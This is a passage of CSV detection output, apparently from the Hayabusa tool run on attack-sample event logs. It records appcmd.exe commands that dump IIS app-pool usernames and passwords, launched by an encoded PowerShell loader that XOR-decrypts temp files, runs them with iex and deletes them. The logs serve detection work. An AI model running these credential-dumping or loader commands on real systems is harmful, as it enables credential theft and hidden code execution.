ZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 